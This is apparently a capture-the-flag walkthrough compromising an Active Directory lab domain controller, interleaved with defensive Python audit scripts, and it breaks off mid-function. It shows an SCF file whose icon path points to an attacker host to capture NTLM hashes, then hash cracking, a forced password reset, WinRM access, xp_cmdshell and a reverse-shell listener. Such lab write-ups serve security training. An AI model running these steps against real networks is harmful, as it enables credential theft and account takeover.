Share The Pain

Active Directory Machine

Enumeration

The first thing to do is run an Nmap scan to identify the open ports and services.

The scan results show that we are dealing with an Active Directory domain controller, which is essentially the core of this challenge.

$ sudo nmap --top-ports=1000 10.1.125.195 -sCV

Nmap scan report for DC01.hack.smarter (10.1.125.195)
Host is up (0.16s latency).
Not shown: 987 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-06-20 13:28:24Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hack.smarter0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: hack.smarter0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-06-20T13:28:42+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: HACK
|   NetBIOS_Domain_Name: HACK
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: hack.smarter
|   DNS_Computer_Name: DC01.hack.smarter
|   DNS_Tree_Name: hack.smarter
|   Product_Version: 10.0.20348
|_  System_Time: 2026-06-20T13:28:33+00:00
| ssl-cert: Subject: commonName=DC01.hack.smarter
| Not valid before: 2026-06-18T23:38:02
|_Not valid after:  2026-12-18T23:38:02
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-06-20T13:28:35
|_  start_date: N/A


The challenge does not provide initial credentials, so gaining a foothold is our first objective.

Since we do not have any credentials yet, we can try Null Authentication. The first service worth testing is SMB, and we can use NetExec to check it.

> nxc smb 10.1.125.195 -u '' -p ''

SMB         10.1.125.195    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.smarter) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.1.125.195    445    DC01             [+] hack.smarter\: 

The NetExec output confirms that Null Authentication is enabled. Now, let’s check if there are any available SMB shares to enumerate.

> nxc smb 10.1.125.195 -u '' -p '' --shares

SMB         10.1.125.195    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.smarter) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.1.125.195    445    DC01             [+] hack.smarter\: 
SMB         10.1.125.195    445    DC01             [*] Enumerated shares
SMB         10.1.125.195    445    DC01             Share           Permissions     Remark
SMB         10.1.125.195    445    DC01             -----           -----------     ------
SMB         10.1.125.195    445    DC01             ADMIN$                          Remote Admin
SMB         10.1.125.195    445    DC01             C$                              Default share
SMB         10.1.125.195    445    DC01             IPC$                            Remote IPC
SMB         10.1.125.195    445    DC01             NETLOGON                        Logon server share 
SMB         10.1.125.195    445    DC01             Share           READ,WRITE      
SMB         10.1.125.195    445    DC01             SYSVOL                          Logon server share 

Enumerating the available shares reveals that the share named Share grants us both READ and WRITE permissions.

Ensure that the target's IP address is mapped to its domain names in the /etc/hosts file (the entry below uses a placeholder for the target IP):

YourIP     DC01.hack.smarter hack.smarter DC01

The entry can also be generated with nxc:

> nxc smb 10.1.125.195 -u '' -p '' --generate-hosts-file host
SMB         10.1.125.195      445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.smarter) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.1.125.195      445    DC01             [+] hack.smarter\: 

> cat host
10.1.125.195     DC01.hack.smarter hack.smarter DC01

Gaining Foothold

Since we are dealing with an Active Directory environment, we know that Windows machines are present on the network. A well-known technique in this scenario is to upload a malicious SCF (Shell Command File) to a writable SMB share. When any user browses that share in Windows Explorer, Explorer tries to load the icon referenced by the file's UNC path, which forces the victim's machine to authenticate to our host over SMB without any user interaction. By running Responder as a rogue authentication server, we can capture the NTLMv2 hash of the user who browsed the share.

  • First, we create a malicious SCF file containing a UNC path that points back to our machine's IP address.

[Shell]
Command=2
IconFile=\\<YourVpnIP>\share\icon.ico
[Taskbar]
Command=ToggleDesktop
  • We upload the SCF file to the writable Share.

> smbclient //10.1.125.195/Share -N
Try "help" to get a list of possible commands.
smb: \> put sys.scf
putting file sys.scf as \sys.scf (0.2 kb/s) (average 0.2 kb/s)
smb: \> dir
  .                                   D        0  Sat Jun 20 10:10:37 2026
  ..                                DHS        0  Fri Sep  5 23:46:21 2025
  link.url                            A      110  Fri Jun 19 20:25:13 2026
  sys.scf                            A       90  Sat Jun 20 10:10:38 2026

		31292671 blocks of size 4096. 27255238 blocks available
smb: \> 
  • Then we run Responder on our VPN interface to act as a rogue SMB server and intercept any incoming authentication attempts.

> sudo responder -I tun0                       
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-4B8Q6OQDKK4]
    Responder Domain Name      [U02K.LOCAL]
    Responder DCE-RPC Port     [48947]

[+] Listening for events...

[*] Skipping previously captured hash for HACK\bob.ross
[*] Skipping previously captured hash for HACK\bob.ross
[*] Skipping previously captured hash for HACK\bob.ross
[*] Skipping previously captured hash for HACK\bob.ross
[*] Skipping previously captured hash for HACK\bob.ross
[*] Skipping previously captured hash for HACK\bob.ross

Shortly after, Responder successfully captures the NTLMv2 hash of the user bob.ross, which is saved in Responder’s log directory at /usr/share/responder/logs/.

> cat /usr/share/responder/logs/SMB-NTLMv2-SSP-10.1.125.195.txt
bob.ross::HACK:5361....
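From the defender's side, the SCF trick works because Explorer resolves IconFile paths on its own while merely listing a folder, so the real exposure is a share that anonymous users can write to; .url shortcuts carry the same IconFile key (the share listing above already contains a link.url). The Python script below is added here as an example and is not part of the original write-up: it audits a share's contents for .scf/.url files whose auto-resolved UNC paths point outside the domain. It is meant to run against a mounted or locally accessible copy of the share; the domain suffix, the trusted network range and the two sample files are assumptions constructed for the demo.

```python
"""Audit a share for .scf/.url files whose auto-resolved UNC paths leave the domain."""
import ipaddress
import re
import tempfile
from pathlib import Path

# Matches the host part of a \\host\share\... path.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")
# INI keys Explorer dereferences while rendering a folder listing
# (file-format facts: [Shell]/IconFile for .scf; [InternetShortcut]/IconFile and URL for .url).
WATCHED_KEYS = {("shell", "iconfile"), ("internetshortcut", "iconfile"), ("internetshortcut", "url")}
SHORTCUT_SUFFIXES = {".scf", ".url"}


def parse_ini(text):
    """Minimal INI reader yielding (section, key, value); section and key are lower-cased."""
    section = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif "=" in line:
            key, _, value = line.partition("=")
            yield section, key.strip().lower(), value.strip()


def referenced_hosts(text):
    """Hosts named by UNC paths in the keys Explorer resolves without any click."""
    hosts = []
    for section, key, value in parse_ini(text):
        match = UNC_RE.match(value) if (section, key) in WATCHED_KEYS else None
        if match:
            hosts.append(match.group(1))
    return hosts


def is_trusted_host(host, domain_suffix, trusted_networks, allowed_names=()):
    """Trusted means: an address inside our networks, an FQDN under our domain, or an allow-listed name."""
    host = host.lower().rstrip(".")
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:  # not an IP literal, so judge it as a name
        return host == domain_suffix or host.endswith("." + domain_suffix) or host in allowed_names
    return any(addr in net for net in trusted_networks)


def scan_directory(root, domain_suffix, trusted_networks, allowed_names=()):
    """Return [(relative path, untrusted host)] for every shortcut pointing outside the domain."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not (path.is_file() and path.suffix.lower() in SHORTCUT_SUFFIXES):
            continue
        text = path.read_text(encoding="utf-8", errors="ignore")
        for host in referenced_hosts(text):
            if not is_trusted_host(host, domain_suffix, trusted_networks, allowed_names):
                findings.append((path.relative_to(root).as_posix(), host))
    return findings


def demo():
    """Constructed sample share: a benign .url plus an .scf whose icon lives on a foreign host.
    198.51.100.7 is a documentation-range address standing in for an attacker's VPN IP."""
    benign = ("[InternetShortcut]\r\nURL=https://intranet.hack.smarter/\r\n"
              "IconFile=\\\\DC01.hack.smarter\\NETLOGON\\logo.ico\r\nIconIndex=0\r\n")
    suspicious = ("[Shell]\r\nCommand=2\r\nIconFile=\\\\198.51.100.7\\share\\icon.ico\r\n"
                  "[Taskbar]\r\nCommand=ToggleDesktop\r\n")
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "link.url").write_text(benign)
        Path(tmp, "sys.scf").write_text(suspicious)
        return scan_directory(tmp, "hack.smarter", [ipaddress.ip_network("10.1.125.0/24")])


if __name__ == "__main__":
    for rel_path, host in demo():
        print(f"[!] {rel_path}: Explorer would authenticate to untrusted host {host}")
```

Whatever the scan finds, the controls that close this vector are the same: no write access for anonymous or Authenticated Users on shares that people browse, null sessions disabled, and outbound SMB (TCP 445) from clients to untrusted networks blocked at the edge so the forced authentication never leaves the estate.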

We can attempt to crack this hash offline using hashcat.

> hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --show
BOB.ROSS::HACK:5361e93....:13***************

Now we have a domain user!

Compromising alice.wonderland

I performed a quick ACL scan with my own tool and found the following:

> python3 aclhug.py -u 'bob.ross' -p '13***************' --dc-ip 10.1.125.195 -d hack.smarter 
AD ACL Hunter
  Time      : 2026-06-20 11:55:42 EDT
  User      : bob.ross
  Domain    : hack.smarter
  DC IP     : 10.1.125.195
  Base DN   : DC=HACK,DC=SMARTER

[*] Connecting...
[+] Connection established

[*] Resolving 'bob.ross'...
[+] SID  : S-1-5-21-3782576407-3043698477-3578684825-1103
[+] DN   : CN=bob.ross,CN=Users,DC=hack,DC=smarter
[+] Type : User

[*] Paged ACL scan (page_size=500)...
[*] Scanning 249 objects for SID S-1-5-21-3782576407-3043698477-3578684825-1103...
  [████████████████████] 100%  (249/249)  

════════════════════════════════════════════════════════════════════════════════

  🎯 ACL Results  ›  bob.ross  [user]
  Summary: 🔴 CRITICAL: 1  🟠 HIGH: 1

  🔴 CRITICAL  GenericAll
       Target    : alice.wonderland  [top | person | organizationalperson | user]
       DN        : CN=alice.wonderland,CN=Users,DC=hack,DC=smarter
       Rights    : GenericAll
       Technique : Full Object Control — read, write, delete, change owner, modify DACL
       Methods   : force-change-password, add-member, write-dacl, take-ownership, shadow-credentials, set-spn, set-rbcd, set-primary-group, set-scriptpath, write-property
       Attack    : Exploit any of the listed methods. GenericAll = complete account
                   takeover.
       ACE Type  : ACCESS_ALLOWED_ACE

  🟠 HIGH      WriteOwner
       Target    : alice.wonderland  [top | person | organizationalperson | user]
       DN        : CN=alice.wonderland,CN=Users,DC=hack,DC=smarter
       Rights    : WriteOwner
       Technique : Take Ownership — become object owner, then modify DACL freely
       Methods   : take-ownership → write-dacl → full-control
       Attack    : Set yourself as owner, grant WriteDacl, grant GenericAll.
       ACE Type  : ACCESS_ALLOWED_ACE

════════════════════════════════════════════════════════════════════════════════

From the output, we can observe that our foothold user bob.ross has GenericAll and WriteOwner privileges over alice.wonderland. Therefore, we can force a password change on alice.wonderland using tools such as bloodyAD.
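Both findings come down to bits in the access mask of ACEs stored on alice.wonderland's security descriptor. The Python below is added here as an example; it is not the aclhug.py tool from the write-up and performs no LDAP queries itself. It decodes the masks of already-fetched ACEs into the same right names, skips principals that are expected to hold such rights, and ranks what remains. The mask constants and the two extended-right GUIDs are public ADS_RIGHTS_ENUM and schema values; the ACE list and the expected-trustee set are constructed for the demo.

```python
"""Decode AD access masks and flag trustees that hold takeover rights over an object."""
# Access-mask bits from ADS_RIGHTS_ENUM (public Windows SDK / MS-ADTS constants).
RIGHT_DS_WRITE_PROP = 0x00000020
RIGHT_DS_CONTROL_ACCESS = 0x00000100
RIGHT_WRITE_DAC = 0x00040000
RIGHT_WRITE_OWNER = 0x00080000
RIGHT_GENERIC_ALL = 0x10000000
RIGHT_GENERIC_WRITE = 0x40000000
# All standard and DS-specific rights at once: how "full control" is usually stored in a DACL.
FULL_CONTROL_MASK = 0x000F01FF

# rightsGuid of the User-Force-Change-Password extended right (public schema constant).
FORCE_CHANGE_PASSWORD_GUID = "00299570-246d-11d0-a768-00aa006e0529"

SEVERITY = {"GenericAll": "CRITICAL", "WriteOwner": "HIGH", "WriteDacl": "HIGH",
            "GenericWrite": "HIGH", "AllExtendedRights": "HIGH", "ForceChangePassword": "HIGH"}

# Principals expected to hold such rights (constructed for the demo); anything else deserves a ticket.
EXPECTED_TRUSTEES = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators",
                     "HACK\\Domain Admins", "HACK\\Enterprise Admins"}


def rights_from_ace(ace):
    """Name the takeover-relevant rights one allow-ACE confers (empty list if none).

    ace: {"trustee": str, "mask": int, "type": "ACCESS_ALLOWED"|"ACCESS_DENIED",
          "object_type": extended-right/property GUID, or None meaning "all"}.
    """
    if ace.get("type", "ACCESS_ALLOWED") != "ACCESS_ALLOWED":
        return []
    mask = ace["mask"]
    guid = (ace.get("object_type") or "").lower()
    if mask & RIGHT_GENERIC_ALL or (mask & FULL_CONTROL_MASK) == FULL_CONTROL_MASK:
        return ["GenericAll"]  # implies everything below
    found = []
    if mask & RIGHT_WRITE_OWNER:
        found.append("WriteOwner")
    if mask & RIGHT_WRITE_DAC:
        found.append("WriteDacl")
    if mask & RIGHT_GENERIC_WRITE or (mask & RIGHT_DS_WRITE_PROP and not guid):
        found.append("GenericWrite")  # may write every property of the object
    if mask & RIGHT_DS_CONTROL_ACCESS:
        if not guid:
            found.append("AllExtendedRights")
        elif guid == FORCE_CHANGE_PASSWORD_GUID:
            found.append("ForceChangePassword")
    return found


def audit_object(aces, expected=EXPECTED_TRUSTEES):
    """Sorted (severity, trustee, right) findings for trustees outside the expected admin set."""
    findings = []
    for ace in aces:
        if ace["trustee"] in expected:
            continue
        for right in rights_from_ace(ace):
            findings.append((SEVERITY[right], ace["trustee"], right))
    rank = {"CRITICAL": 0, "HIGH": 1}
    return sorted(findings, key=lambda f: (rank[f[0]], f[1], f[2]))


def demo():
    """Constructed DACL for alice.wonderland mirroring the write-up: bob.ross holds full control
    plus WriteOwner, the admin groups hold their normal rights, SELF may change its own password."""
    aces = [
        {"trustee": "HACK\\Domain Admins", "mask": FULL_CONTROL_MASK},
        {"trustee": "NT AUTHORITY\\SYSTEM", "mask": FULL_CONTROL_MASK},
        {"trustee": "HACK\\bob.ross", "mask": FULL_CONTROL_MASK},
        {"trustee": "HACK\\bob.ross", "mask": RIGHT_WRITE_OWNER},
        # User-Change-Password (needs the old password), not the force-change right.
        {"trustee": "NT AUTHORITY\\SELF", "mask": RIGHT_DS_CONTROL_ACCESS,
         "object_type": "ab721a53-1e2f-11d0-9819-00aa0040529b"},
        # A deny ACE never grants anything, so it must not be reported.
        {"trustee": "HACK\\helpdesk", "mask": RIGHT_WRITE_DAC, "type": "ACCESS_DENIED"},
    ]
    return audit_object(aces)


if __name__ == "__main__":
    for severity, trustee, right in demo():
        print(f"{severity:8} {trustee:24} {right}")
```

In a real audit the ACE dictionaries are filled from the object's nTSecurityDescriptor (an LDAP read plus a security-descriptor parser) rather than typed in. The remediation for the finding above is simply to remove bob.ross's ACEs from alice.wonderland: a non-admin user should never own or fully control another account, and any such ACE on a tier-0 object warrants an immediate review of how it got there.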

> bloodyAD --host 10.1.125.195 -d hack.smarter -u 'bob.ross' -p '13***************' set password alice.wonderland 'Password@123'             
[+] Password changed successfully!

Let's verify the new credentials:

> nxc smb 10.1.125.195 -u 'alice.wonderland' -p 'Password@123'
SMB         10.1.125.195    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.smarter) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.1.125.195    445    DC01             [+] hack.smarter\alice.wonderland:Password@123 

I then used the same tool to check whether alice.wonderland holds any dangerous rights over other objects, but none were found.

> python3 aclhug.py -u 'bob.ross' -p '13***************' --dc-ip 10.1.125.195 -d hack.smarter -t alice.wonderland
AD ACL Hunter
  Time      : 2026-06-20 12:07:11 EDT
  User      : bob.ross
  Domain    : hack.smarter
  DC IP     : 10.1.125.195
  Base DN   : DC=HACK,DC=SMARTER

[*] Connecting...
[+] Connection established

[*] Resolving 'alice.wonderland'...
[+] SID  : S-1-5-21-3782576407-3043698477-3578684825-1104
[+] DN   : CN=alice.wonderland,CN=Users,DC=hack,DC=smarter
[+] Type : User

[*] Paged ACL scan (page_size=500)...
[*] Scanning 249 objects for SID S-1-5-21-3782576407-3043698477-3578684825-1104...
  [████████████████████] 100%  (249/249)  

════════════════════════════════════════════════════════════════════════════════

  🎯 ACL Results  ›  alice.wonderland  [user]
  ✔ No dangerous rights found.

════════════════════════════════════════════════════════════════════════════════

However, alice.wonderland is a member of the Remote Management Users group, which means we can access the machine remotely via WinRM or RDP.

> python3 aclhug.py -u 'bob.ross' -p '13***************' --dc-ip 10.1.125.195 -d hack.smarter --member-of alice.wonderland
AD ACL Hunter
  Time      : 2026-06-20 12:07:29 EDT
  User      : bob.ross
  Domain    : hack.smarter
  DC IP     : 10.1.125.195
  Base DN   : DC=HACK,DC=SMARTER

[*] Connecting...
[+] Connection established

[*] Resolving memberships for 'alice.wonderland'...

════════════════════════════════════════════════════════════════════════════════

  🔑 Group Memberships  ›  alice.wonderland
    Remote Management Users  CN=Remote Management Users,CN=Builtin,DC=hack,DC=smarter

════════════════════════════════════════════════════════════════════════════════

User Flag

> evil-winrm -i 10.1.125.195 -u alice.wonderland -p 'Password@123'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\alice.wonderland\Documents> cd ..
*Evil-WinRM* PS C:\Users\alice.wonderland> cd Desktop
*Evil-WinRM* PS C:\Users\alice.wonderland\Desktop> dir


    Directory: C:\Users\alice.wonderland\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          9/3/2025   2:07 PM             54 user.txt

Lateral Movement via MSSQL Code Execution

While enumerating the system, I found several indicators suggesting that an MSSQL service is running on this machine.

*Evil-WinRM* PS C:\> dir "Program Files"


    Directory: C:\Program Files


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          9/5/2025   8:45 PM                Amazon
d-----          9/2/2025   2:10 PM                Common Files
d-----          3/2/2022   7:58 PM                Internet Explorer
d-----          9/3/2025   2:07 PM                Microsoft
d-----          9/3/2025   2:07 PM                Microsoft SQL Server
d-----          9/3/2025   2:07 PM                Microsoft Visual Studio 10.0
d-----          9/3/2025   2:07 PM                Microsoft.NET
d-----          5/8/2021   1:20 AM                ModifiableWindowsApps
d-----          9/2/2025   7:26 PM                PackageManagement
d-----          9/5/2025   8:33 PM                VMware
d-----          9/2/2025   6:54 PM                Windows Defender
d-----          3/2/2022   7:58 PM                Windows Defender Advanced Threat Protection
d-----          3/2/2022   7:58 PM                Windows Mail
d-----          3/2/2022   7:58 PM                Windows Media Player
d-----          5/8/2021   2:35 AM                Windows NT
d-----          3/2/2022   7:58 PM                Windows Photo Viewer
d-----          9/2/2025   7:26 PM                WindowsPowerShell

*Evil-WinRM* PS C:\> dir "Temp"


    Directory: C:\Temp


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          9/3/2025   2:01 PM        6379936 SQLEXPRESS.exe

Listing the listening TCP ports confirms an MSSQL instance bound to 127.0.0.1:1433, which is why it did not appear in the external Nmap scan.

*Evil-WinRM* PS C:\Users\alice.wonderland\Documents> netstat -ano | findstr LISTENING
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       688
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       932
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       688
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       688
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       932
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       688
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       688
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       688
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       396
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       3244
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       688
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       580
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1180
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       688
  TCP    0.0.0.0:49671          0.0.0.0:0              LISTENING       2024
  TCP    0.0.0.0:49674          0.0.0.0:0              LISTENING       2580
  TCP    0.0.0.0:49677          0.0.0.0:0              LISTENING       688
  TCP    0.0.0.0:49678          0.0.0.0:0              LISTENING       1576
  TCP    0.0.0.0:49681          0.0.0.0:0              LISTENING       2828
  TCP    0.0.0.0:49699          0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:49710          0.0.0.0:0              LISTENING       3336
  TCP    0.0.0.0:49776          0.0.0.0:0              LISTENING       3352
  TCP    10.1.125.195:53        0.0.0.0:0              LISTENING       3336
  TCP    10.1.125.195:139       0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       3336
  TCP    127.0.0.1:1433         0.0.0.0:0              LISTENING       4152   <--------
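The instance only shows up here because it listens on 127.0.0.1 rather than on every interface, so the earlier Nmap scan could not see port 1433 at all. The Python below is added here as an example and is not part of the original write-up: it parses netstat -ano LISTENING rows and reports the listeners bound to loopback only, i.e. the services an external scan never sees but any local user can reach. The port-to-service hints are assumptions, and the sample rows are a subset of the output above plus one constructed ESTABLISHED line to show that non-listening rows are skipped.

```python
"""Parse `netstat -ano` LISTENING rows and point out services a remote port scan cannot see."""
import re

# One TCP listener row: proto, local address, port, foreign address, state, PID.
LISTEN_RE = re.compile(r"^\s*(TCP)\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")

# Port-to-service hints for the triage report (well-known defaults, not a lookup on the host).
PORT_HINTS = {53: "DNS", 88: "Kerberos", 389: "LDAP", 445: "SMB", 1433: "MSSQL (TDS)",
              3389: "RDP", 5985: "WinRM"}
LOOPBACK = {"127.0.0.1", "[::1]"}

# Constructed sample: rows from the netstat output in the write-up plus one made-up ESTABLISHED row.
SAMPLE = """\
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    10.1.125.195:53        0.0.0.0:0              LISTENING       3336
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       3336
  TCP    127.0.0.1:1433         0.0.0.0:0              LISTENING       4152
  TCP    [::]:3389              [::]:0                 LISTENING       396
  TCP    10.1.125.195:5985      10.1.125.30:51000      ESTABLISHED     4
"""


def parse_listeners(text):
    """Return [(address, port, pid)] for every LISTENING row; headers and other states are skipped."""
    rows = []
    for line in text.splitlines():
        m = LISTEN_RE.match(line)
        if m:
            _, addr, port, pid = m.groups()
            rows.append((addr, int(port), int(pid)))
    return rows


def loopback_only_ports(listeners):
    """Ports bound solely to 127.0.0.1/[::1]; nothing on them is reachable from the network."""
    addrs_by_port = {}
    for addr, port, _ in listeners:
        addrs_by_port.setdefault(port, set()).add(addr)
    return sorted(port for port, addrs in addrs_by_port.items() if addrs <= LOOPBACK)


def hidden_services(text):
    """(port, pid, hint) for loopback-only listeners: local-only services an external scan misses."""
    listeners = parse_listeners(text)
    pids = {port: pid for _, port, pid in listeners}
    return [(port, pids[port], PORT_HINTS.get(port, "unknown"))
            for port in loopback_only_ports(listeners)]


if __name__ == "__main__":
    for port, pid, hint in hidden_services(SAMPLE):
        print(f"port {port} (pid {pid}, {hint}) listens on loopback only: "
              "invisible to a remote scan, reachable by any local user")
```

Binding SQL Server to loopback is good practice when nothing remote needs it, but it is not a security boundary against local accounts: every user who can log on interactively or over WinRM (here, Remote Management Users) can still connect, which is exactly what the next step relies on.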

We can interact with the MSSQL service with ease, as the sqlcmd tool is already installed on the machine.

We do not have credentials for the MSSQL service; however, sqlcmd provides the -E flag, which opens a trusted connection using the credentials of the current Windows session.

*Evil-WinRM* PS C:\Users\alice.wonderland\Documents> sqlcmd -S 127.0.0.1 -E -Q "SELECT name FROM master.dbo.sysdatabases"
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb

MSSQL can execute OS commands through xp_cmdshell, which runs under the security context of the SQL Server service account. In this scenario xp_cmdshell was already enabled; if it is not, it can be enabled manually by a login with the necessary server-level permissions.

*Evil-WinRM* PS C:\Users\alice.wonderland\Documents> sqlcmd -S 127.0.0.1 -E -Q "xp_cmdshell 'whoami'"
output
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
nt service\mssql$sqlexpress
NULL

Now, let's obtain a reverse shell as nt service\mssql$sqlexpress using a Base64-encoded PowerShell payload.

> nc -nlvp 7777                                            
Listening on 0.0.0.0 7777
Connection received on 10.1.125.195 50202

PS C:\Windows\system32> whoami
nt service\mssql$sqlexpress
PS C:\Windows\system32> 

Escalating our Privileges

Checking the privileges of the mssql$sqlexpress service account shows several interesting entries, most notably SeImpersonatePrivilege. This privilege is typically abused with JuicyPotato to escalate privileges; however, JuicyPotato is not compatible with Windows Server 2022.

PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
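Reading whoami /priv by eye gets tedious across many service accounts, so the Python below, added here as an example that is not part of the original write-up, extracts the privilege table and lists the entries that usually decide a privilege-escalation assessment. The sample is a constructed subset of the service-account output above, and the HIGH_RISK set is an assumption reflecting common triage practice. Note that Disabled only means the privilege is not currently enabled in the token; the process holding it can still switch it on, so those entries are reported as well.

```python
"""Parse `whoami /priv` output and list the token privileges that matter for escalation triage."""

# Privileges that let their holder reach SYSTEM or read/alter anything on the host
# (a well-known triage set; an assumption for this demo, not a claim about any one box).
HIGH_RISK = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeDebugPrivilege",
             "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege",
             "SeLoadDriverPrivilege", "SeTcbPrivilege"}

# Constructed sample: service-account rows from the write-up, laid out as whoami prints them.
SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""


def parse_whoami_priv(text):
    """Return {privilege name: 'Enabled'|'Disabled'}. Data rows follow the '====' ruler line."""
    lines = text.splitlines()
    ruler = next((i for i, line in enumerate(lines)
                  if line.strip() and set(line.strip()) <= {"=", " "}), None)
    if ruler is None:
        return {}
    privs = {}
    for line in lines[ruler + 1:]:
        parts = line.split()
        # Name is the first column and state the last; the description in between may contain spaces.
        if len(parts) >= 2 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
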